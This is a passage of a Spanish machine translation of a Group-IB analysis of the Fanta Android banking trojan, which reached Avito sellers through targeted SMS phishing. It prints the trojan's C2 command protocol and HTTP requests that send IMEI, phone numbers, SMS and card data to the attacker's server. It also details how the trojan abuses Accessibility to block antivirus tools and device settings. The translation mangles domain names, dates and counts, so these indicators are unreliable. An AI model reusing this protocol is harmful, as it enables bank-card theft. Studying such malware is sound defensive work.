Un día quiere vender algo en Avito y, después de publicar una descripción detallada de su producto (por ejemplo, un módulo RAM), recibirá este mensaje:
Una vez que abra el enlace, verá una página aparentemente inofensiva que le notifica a usted, el feliz y exitoso vendedor, que se ha realizado una compra:
Una vez que haga clic en el botón "Continuar", se descargará en su dispositivo Android un archivo APK con un icono y un nombre que inspire confianza. Instalaste una aplicación que por alguna razón solicitó derechos de Servicio de Accesibilidad, luego aparecieron un par de ventanas y desaparecieron rápidamente y... Eso es todo.
Vas a consultar tu saldo, pero por algún motivo tu aplicación bancaria vuelve a solicitar los datos de tu tarjeta. Después de ingresar los datos, sucede algo terrible: por alguna razón que aún no estás clara, el dinero comienza a desaparecer de tu cuenta. Estás intentando solucionar el problema, pero tu teléfono se resiste: pulsa las teclas “Atrás” y “Inicio”, no se apaga y no te permite activar ninguna medida de seguridad. Como resultado, te quedas sin dinero, tus bienes no han sido comprados, estás confundido y te preguntas: ¿qué pasó?
La respuesta es simple: usted ha sido víctima del troyano Fanta para Android, un miembro de la familia Flexnet. ¿Cómo pasó esto? Expliquemos ahora.
Autores: Andrey Polovinkin, especialista junior en análisis de malware, Iván Pisarev, especialista en análisis de malware.
Algunas estadísticas
La familia Flexnet de troyanos para Android se dio a conocer por primera vez en 2015. Durante un período de actividad bastante largo, la familia se expandió a varias subespecies: Fanta, Limebot, Lipton, etc. El troyano, así como la infraestructura asociada a él, no se quedan quietos: se están desarrollando nuevos esquemas de distribución efectivos; en nuestro caso, páginas de phishing de alta calidad dirigidas a un usuario-vendedor específico, y los desarrolladores del troyano siguen las tendencias de moda en Escritura de virus: agrega nuevas funciones que permiten robar dinero de dispositivos infectados de manera más eficiente y evitar los mecanismos de protección.
La campaña descrita en este artículo está dirigida a usuarios de Rusia; en Ucrania se registró un pequeño número de dispositivos infectados, y aún menos en Kazajstán y Bielorrusia.
Aunque Flexnet ha estado en el campo de los troyanos de Android durante más de 4 años y ha sido estudiado en detalle por muchos investigadores, todavía está en buena forma. A partir de enero de 2019, el importe potencial de los daños asciende a más de 35 millones de rublos, y esto es sólo para las campañas en Rusia. En 2015 se vendieron varias versiones de este troyano para Android en foros clandestinos, donde también se podía encontrar el código fuente del troyano con una descripción detallada. Esto significa que las estadísticas de daños en el mundo son aún más impresionantes. No es un mal indicador para un hombre tan mayor, ¿no?
De la venta al engaño
Como puede verse en la captura de pantalla presentada anteriormente de una página de phishing para el servicio de Internet para publicar anuncios Avito, estaba preparada para una víctima específica. Al parecer, los atacantes utilizan uno de los analizadores de Avito, que extrae el número de teléfono y el nombre del vendedor, así como la descripción del producto. Después de ampliar la página y preparar el archivo APK, la víctima recibe un SMS con su nombre y un enlace a una página de phishing que contiene una descripción de su producto y el importe recibido por la “venta” del producto. Al hacer clic en el botón, el usuario recibe un archivo APK malicioso: Fanta.
Un estudio del dominio shcet491[.]ru mostró que está delegado a los servidores DNS de Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
El archivo de zona de dominio contiene entradas que apuntan a las direcciones IP 31.220.23[.]236, 31.220.23[.]243 y 31.220.23[.]235. Sin embargo, el registro de recursos principal del dominio (registro A) apunta a un servidor con la dirección IP 178.132.1[.]240.
La dirección IP 178.132.1[.]240 se encuentra en los Países Bajos y pertenece al proveedor de alojamiento. corriente mundial. Las direcciones IP 31.220.23[.]235, 31.220.23[.]236 y 31.220.23[.]243 están ubicadas en el Reino Unido y pertenecen al servidor de alojamiento compartido HOSTINGER. Utilizado como grabadora openprov-ru. Los siguientes dominios también se resolvieron en la dirección IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Cabe señalar que los enlaces en el siguiente formato estaban disponibles en casi todos los dominios:
http://(www.){0,1}<%domain%>/[0-9]{7}
Esta plantilla también incluye un enlace de un mensaje SMS. Según los datos históricos, se descubrió que un dominio corresponde a varios enlaces en el patrón descrito anteriormente, lo que indica que se utilizó un dominio para distribuir el troyano a varias víctimas.
Avancemos un poco: el troyano descargado mediante un enlace de un SMS utiliza la dirección como servidor de control onusedseddohap[.]club. Este dominio se registró el 2019 de marzo de 03 y, a partir del 12 de abril de 2019, las aplicaciones APK interactuaron con este dominio. Según los datos obtenidos de VirusTotal, un total de 04 aplicaciones interactuaron con este servidor. El dominio en sí resolvió la dirección IP. 217.23.14[.]27, ubicado en los Países Bajos y propiedad del proveedor de alojamiento corriente mundial. Utilizado como grabadora namecheap. Los dominios también se resolvieron en esta dirección IP club de mapache malo[.] (a partir del 2018 de septiembre de 09) y mapache malo[.]en vivo (a partir del 2018/10/25). Con dominio club de mapache malo[.] más de 80 archivos APK interactuados con mapache malo[.]en vivo - Mas que 100.
En general, el ataque progresa de la siguiente manera:
¿Qué hay debajo de la tapa de Fanta?
Como muchos otros troyanos de Android, Fanta es capaz de leer y enviar mensajes SMS, realizar solicitudes USSD y mostrar sus propias ventanas encima de las aplicaciones (incluidas las bancarias). Sin embargo, el arsenal de funcionalidades de esta familia ha llegado: Fanta empezó a utilizar AccesibilidadServicio para diversos fines: leer el contenido de las notificaciones de otras aplicaciones, evitar la detección y detener la ejecución de un troyano en un dispositivo infectado, etc. Fanta funciona en todas las versiones de Android no anteriores a la 4.4. En este artículo veremos más de cerca el siguiente ejemplo de Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Inmediatamente después del lanzamiento
Inmediatamente después del lanzamiento, el troyano oculta su icono. La aplicación sólo puede funcionar si el nombre del dispositivo infectado no está en la lista:
- android_x86
- VirtualBox
- Nexus 5X (cabeza de toro)
- Nexus 5 (navaja)
Esta verificación se lleva a cabo en el servicio principal del troyano: Servicio principal. Cuando se inicia por primera vez, los parámetros de configuración de la aplicación se inicializan a los valores predeterminados (el formato para almacenar los datos de configuración y su significado se analizarán más adelante) y se registra un nuevo dispositivo infectado en el servidor de control. Se enviará una solicitud HTTP POST con el tipo de mensaje al servidor registrarse_bot e información sobre el dispositivo infectado (versión de Android, IMEI, número de teléfono, nombre del operador y código de país en el que está registrado el operador). La dirección sirve como servidor de control. hXXp://onuseseddohap[.]club/controller.php. En respuesta, el servidor envía un mensaje que contiene los campos bot_id, bot_pwd, servidor — la aplicación guarda estos valores como parámetros del servidor CnC. Parámetro servidor opcional si el campo no fue recibido: Fanta usa la dirección de registro - hXXp://onuseseddohap[.]club/controller.php. La función de cambiar la dirección CnC se puede utilizar para resolver dos problemas: distribuir la carga uniformemente entre varios servidores (si hay una gran cantidad de dispositivos infectados, la carga en un servidor web no optimizado puede ser alta) y también usar un servidor alternativo en caso de fallo de uno de los servidores del CnC.
Si se produce un error al enviar la solicitud, el troyano repetirá el proceso de registro después de 20 segundos.
Una vez que el dispositivo se haya registrado exitosamente, Fanta mostrará el siguiente mensaje al usuario:
Nota importante: el servicio llamado Seguridad del sistema — el nombre del servicio troyano y después de hacer clic en el botón Bueno Se abrirá una ventana con la configuración de Accesibilidad del dispositivo infectado, donde el usuario deberá otorgar derechos de Accesibilidad para el servicio malicioso:
Tan pronto como el usuario enciende AccesibilidadServicio, Fanta obtiene acceso al contenido de las ventanas de la aplicación y a las acciones realizadas en ellas:
Inmediatamente después de recibir derechos de Accesibilidad, el troyano solicita derechos de administrador y derechos para leer notificaciones:
Utilizando AccessibilityService, la aplicación simula las pulsaciones de teclas, otorgándose así todos los derechos necesarios.
Fanta crea múltiples instancias de bases de datos (que se describirán más adelante) necesarias para almacenar los datos de configuración, así como la información recopilada en el proceso sobre el dispositivo infectado. Para enviar la información recopilada, el troyano crea una tarea repetitiva diseñada para descargar campos de la base de datos y recibir un comando del servidor de control. El intervalo de acceso al CnC se establece en función de la versión de Android: en el caso de la 5.1, el intervalo será de 10 segundos, en caso contrario de 60 segundos.
Para recibir la orden, Fanta hace una solicitud. Obtener tarea al servidor de gestión. En respuesta, CnC puede enviar uno de los siguientes comandos:
| Equipo | Descripción |
|---|---|
| 0 | Enviar mensaje SMS |
| 1 | Haga una llamada telefónica o un comando USSD |
| 2 | Actualiza un parámetro intervalo |
| 3 | Actualiza un parámetro interceptar |
| 6 | Actualiza un parámetro administrador de SMS |
| 9 | Comience a recopilar mensajes SMS |
| 11 | Restablece tu teléfono a la configuración de fábrica |
| 12 | Activar/desactivar el registro de la creación del cuadro de diálogo |
Fanta también recopila notificaciones de 70 aplicaciones bancarias, sistemas de pago rápido y billeteras electrónicas y las almacena en una base de datos.
Almacenamiento de parámetros de configuración
Para almacenar los parámetros de configuración, Fanta utiliza un enfoque estándar para la plataforma Android: Preferencias-archivos. La configuración se guardará en un archivo llamado ajustes. En la siguiente tabla encontrará una descripción de los parámetros guardados.
| nombre | Valor por defecto | Valores posibles | Descripción |
|---|---|---|---|
| id | 0 | Entero | ID del robot |
| servidor | hXXp://onuseseddohap[.]club/ | Enlance | Dirección del servidor de control |
| pwd | - | Cordón | Contraseña del servidor |
| intervalo | 20 | Entero | Intervalo de tiempo. Indica cuánto tiempo se deben aplazar las siguientes tareas:
|
| interceptar | todos | todo/número de teléfono | Si el campo es igual a la cadena todos o Número de teléfono, la aplicación interceptará el mensaje SMS recibido y no se mostrará al usuario |
| administrador de SMS | 0 | 0/1 | Activar/desactivar la aplicación como destinatario de SMS predeterminado |
| leer diálogo | false | Verdadero Falso | Activar/desactivar el registro de eventos AccesibilidadEvento |
Fanta también usa el archivo administrador de SMS:
| nombre | Valor por defecto | Valores posibles | Descripción |
|---|---|---|---|
| paquete | - | Cordón | Nombre del administrador de mensajes SMS utilizado |
Interacción con bases de datos
Durante su funcionamiento, el troyano utiliza dos bases de datos. Base de datos nombrada a Se utiliza para almacenar diversa información recopilada desde el teléfono. La segunda base de datos se llama fanta.db y se utiliza para guardar la configuración responsable de crear ventanas de phishing diseñadas para recopilar información sobre tarjetas bancarias.
Troyano utiliza base de datos а para almacenar la información recopilada y registrar sus acciones. Los datos se almacenan en una tabla. los registros. Para crear una tabla, utilice la siguiente consulta SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)La base de datos contiene la siguiente información:
1. Registrar el inicio del dispositivo infectado con un mensaje ¡El teléfono se encendió!
2. Notificaciones de aplicaciones. El mensaje se genera según la siguiente plantilla:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Datos de tarjetas bancarias procedentes de formularios de phishing creados por el troyano. Parámetro VER_NOMBRE puede ser uno de los siguientes:
- AliExpress
- Avito
- Google Play
- Varios <%Nombre de la aplicación%>
El mensaje se registra en el formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Mensajes SMS entrantes/salientes en el formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Información sobre el paquete que crea el cuadro de diálogo en el formato:
(<%Package name%>)<%Package information%>
tabla de ejemplo los registros:
Una de las funciones de Fanta es la recopilación de información sobre tarjetas bancarias. La recopilación de datos se produce mediante la creación de ventanas de phishing al abrir aplicaciones bancarias. El troyano crea la ventana de phishing sólo una vez. La información que la ventana se mostró al usuario se almacena en una tabla. ajustes en la base de datos fanta.db. Para crear una base de datos, utilice la siguiente consulta SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Todos los campos de la tabla ajustes de forma predeterminada se inicializa en 1 (crea una ventana de phishing). Después de que el usuario ingrese sus datos, el valor se establecerá en 0. Ejemplo de campos de tabla ajustes:
- puedo_iniciar sesión — el campo es responsable de mostrar el formulario al abrir una aplicación bancaria
- primer banco - no utilizado
- can_avito — el campo es responsable de mostrar el formulario al abrir la aplicación Avito
- can_ali — el campo es responsable de mostrar el formulario al abrir la aplicación Aliexpress
- puede_otro — el campo es responsable de mostrar el formulario al abrir cualquier aplicación de la lista: Yula, Pandao, Drom Auto, Monedero. Tarjetas de descuentos y bonificaciones, Aviasales, Booking, Trivago
- tarjeta_can — el campo es responsable de mostrar el formulario al abrir Google Play
Interacción con el servidor de gestión.
La interacción de la red con el servidor de administración se produce a través del protocolo HTTP. Para trabajar con la red, Fanta utiliza la popular biblioteca Retrofit. Las solicitudes se envían a: hXXp://onuseseddohap[.]club/controller.php. La dirección del servidor se puede cambiar al registrarse en el servidor. Se pueden enviar cookies como respuesta desde el servidor. Fanta realiza las siguientes solicitudes al servidor:
- El registro del bot en el servidor de control se produce una vez, durante el primer lanzamiento. Los siguientes datos sobre el dispositivo infectado se envían al servidor:
· Cookies — cookies recibidas del servidor (el valor predeterminado es una cadena vacía)
· modo - constante de cadena registrarse_bot
· prefijo - constante entera 2
· versión_sdk — se forma según el siguiente modelo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· Español — IMEI del dispositivo infectado
· país — código del país en el que está registrado el operador, en formato ISO
· número - número de teléfono
· operador - nombre del operadorUn ejemplo de una solicitud enviada al servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>En respuesta a la solicitud, el servidor debe devolver un objeto JSON que contenga los siguientes parámetros:
· bot_id — ID del dispositivo infectado. Si bot_id es igual a 0, Fanta volverá a ejecutar la solicitud.
bot_pwd — contraseña para el servidor.
servidor — dirección del servidor de control. Parámetro opcional. Si no se especifica el parámetro, se utilizará la dirección guardada en la aplicación.Objeto JSON de ejemplo:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Solicite recibir un comando del servidor. Los siguientes datos se envían al servidor:
· Cookies — cookies recibidas del servidor
· oferta — identificación del dispositivo infectado que se recibió al enviar la solicitud registrarse_bot
· pwd —contraseña para el servidor
· administrador_dispositivo — el campo determina si se han obtenido derechos de administrador. Si se han obtenido derechos de administrador, el campo es igual a 1de lo contrario 0
· Accesibilidad — Estado de funcionamiento del Servicio de Accesibilidad. Si el servicio se inició, el valor es 1de lo contrario 0
· Administrador de SMS — muestra si el troyano está habilitado como aplicación predeterminada para recibir SMS
· detectar — muestra en qué estado se encuentra la pantalla. El valor se establecerá 1, si la pantalla está encendida, en caso contrario 0;Un ejemplo de una solicitud enviada al servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Dependiendo del comando, el servidor puede devolver un objeto JSON con diferentes parámetros:
· Equipo Enviar mensaje SMS: Los parámetros contienen el número de teléfono, el texto del mensaje SMS y el ID del mensaje que se envía. El identificador se utiliza al enviar un mensaje al servidor con tipo establecer estado de SMS.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Equipo Haga una llamada telefónica o un comando USSD: El número de teléfono o comando viene en el cuerpo de la respuesta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Equipo Cambiar parámetro de intervalo.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Equipo Cambiar parámetro de intersección.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Equipo Cambiar el campo SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Equipo Recopilar mensajes SMS de un dispositivo infectado.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Equipo Restablece tu teléfono a la configuración de fábrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Equipo Cambiar el parámetro ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Enviar un mensaje con tipo establecer estado de SMS. Esta solicitud se realiza después de ejecutar el comando. Enviar mensaje SMS. La solicitud se ve así:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Carga del contenido de la base de datos. Se transmite una fila por solicitud. Los siguientes datos se envían al servidor:
· Cookies — cookies recibidas del servidor
· modo - constante de cadena setGuardarInboxSms
· oferta — identificación del dispositivo infectado que se recibió al enviar la solicitud registrarse_bot
· texto — texto en el registro de la base de datos actual (campo d de la mesa los registros en la base de datos а)
· número — nombre del registro de la base de datos actual (campo p de la mesa los registros en la base de datos а)
· modo_sms — valor entero (campo m de la mesa los registros en la base de datos а)La solicitud se ve así:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Si se envía correctamente al servidor, la fila se eliminará de la tabla. Ejemplo de un objeto JSON devuelto por el servidor:
{ "response":[], "status":"ok" }
Interactuando con AccessibilityService
AccessibilityService se implementó para hacer que los dispositivos Android sean más fáciles de usar para personas con discapacidades. En la mayoría de los casos, se requiere interacción física para interactuar con una aplicación. AccessibilityService le permite hacerlo mediante programación. Fanta utiliza el servicio para crear ventanas falsas en aplicaciones bancarias y evitar que los usuarios abran la configuración del sistema y algunas aplicaciones.
Utilizando la funcionalidad de AccessibilityService, el troyano monitorea los cambios en los elementos en la pantalla del dispositivo infectado. Como se describió anteriormente, la configuración de Fanta contiene un parámetro responsable de registrar operaciones con cuadros de diálogo: leer diálogo. Si se establece este parámetro, se agregará a la base de datos información sobre el nombre y la descripción del paquete que desencadenó el evento. El troyano realiza las siguientes acciones cuando se activan eventos:
- Simula presionar las teclas Atrás e Inicio en los siguientes casos:
· si el usuario quiere reiniciar su dispositivo
· si el usuario desea eliminar la aplicación “Avito” o cambiar los derechos de acceso
· si hay una mención de la aplicación "Avito" en la página
· al abrir la aplicación Google Play Protect
· al abrir páginas con la configuración de AccessibilityService
· cuando aparece el cuadro de diálogo Seguridad del sistema
· al abrir la página con la configuración "Dibujar sobre otra aplicación"
· al abrir la página “Aplicaciones”, “Recuperación y restablecimiento”, “Restablecimiento de datos”, “Restablecer configuración”, “Panel de desarrollador”, “Especial. oportunidades”, “Oportunidades especiales”, “Derechos especiales”
· si el evento fue generado por ciertas aplicaciones.Lista de aplicaciones
- android
- Maestro Lite
- Clean Master
- Maestro limpio para CPU x86
- Gestión de permisos de aplicaciones Meizu
- Seguridad MIUI
- Clean Master - Antivirus, caché y limpiador de basura
- Controles parentales y GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock y seguridad web Beta
- Limpiador de virus, antivirus, limpiador (MAX Security)
- Seguridad antivirus móvil PRO
- Avast antivirus y protección gratuita 2019
- Megafon de seguridad móvil
- Protección AVG para Xperia
- Seguridad móvil
- Malwarebytes antivirus y protección
- Antivirus para Android 2019
- Maestro de seguridad: antivirus, VPN, AppLock, Booster
- Antivirus AVG para tablet Huawei System Manager
- Accesibilidad de Samsung
- Administrador inteligente de Samsung
- Maestro de seguridad
- Refuerzo de velocidad
- Dr.Web
- Dr.Web Space Security
- Centro de control móvil Dr.Web
- Dr.Web Seguridad Espacio Vida
- Centro de control móvil Dr.Web
- Antivirus y seguridad móvil
- Kaspersky Internet Security: antivirus y protección
- Duración de la batería de Kaspersky: Ahorro y potenciador
- Kaspersky Endpoint Security: protección y gestión
- AVG Antivirus gratis 2019 – Protección para Android
- antivirus para Android
- Norton Mobile Security y Antivirus
- Antivirus, firewall, VPN, seguridad móvil
- Seguridad Móvil: antivirus, VPN, protección contra robo
- Antivirus para Android
- Si se solicita permiso al enviar un mensaje SMS a un número corto, Fanta simula hacer clic en la casilla de verificación Recuerda la elección y botón отправить.
- Cuando intentas quitarle los derechos de administrador al troyano, bloquea la pantalla del teléfono.
- Impide agregar nuevos administradores.
- Si la aplicación antivirus dr.web Detectó una amenaza, Fanta imita presionar el botón ignorar.
- El troyano simula presionar los botones Atrás e Inicio si el evento fue generado por la aplicación Cuidado del dispositivo Samsung.
- Fanta crea ventanas de phishing con formularios para ingresar información sobre tarjetas bancarias si se inicia una aplicación de una lista que incluye alrededor de 30 servicios de Internet diferentes. Entre ellos: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Formularios de phishing
Fanta analiza qué aplicaciones se están ejecutando en el dispositivo infectado. Si se abre una aplicación de interés, el troyano muestra una ventana de phishing encima de todas las demás, que es un formulario para ingresar información de la tarjeta bancaria. El usuario deberá introducir los siguientes datos:
- Número de tarjeta
- Fecha de expiración de la tarjeta
- CVV
- Nombre del titular de la tarjeta (no para todos los bancos)
Dependiendo de la aplicación en ejecución, se mostrarán diferentes ventanas de phishing. A continuación se muestran ejemplos de algunos de ellos:
Aliexpress:
Avito:
Para algunas otras aplicaciones, p. Google Play Market, Aviasales, Pandao, Reservas, Trivago:
como fue realmente
Afortunadamente, la persona que recibió el mensaje SMS descrito al inicio del artículo resultó ser un especialista en ciberseguridad. Por lo tanto, la versión real, no del director, difiere de la contada anteriormente: una persona recibió un SMS interesante, después de lo cual se lo entregó al equipo de Inteligencia de Caza de Amenazas del Grupo IB. El resultado del ataque es este artículo. Final feliz, ¿verdad? Sin embargo, no todas las historias terminan con tanto éxito, y para que la suya no parezca una versión de director con pérdida de dinero, en la mayoría de los casos basta con seguir las siguientes reglas detalladas:
- no instale aplicaciones para un dispositivo móvil con sistema operativo Android desde ninguna fuente que no sea Google Play
- Al instalar una aplicación, preste especial atención a los derechos que solicita la aplicación.
- presta atención a las extensiones de los archivos descargados
- instalar actualizaciones del sistema operativo Android regularmente
- no visite recursos sospechosos y no descargue archivos desde allí
- No haga clic en enlaces recibidos en mensajes SMS.
Fuente: habr.com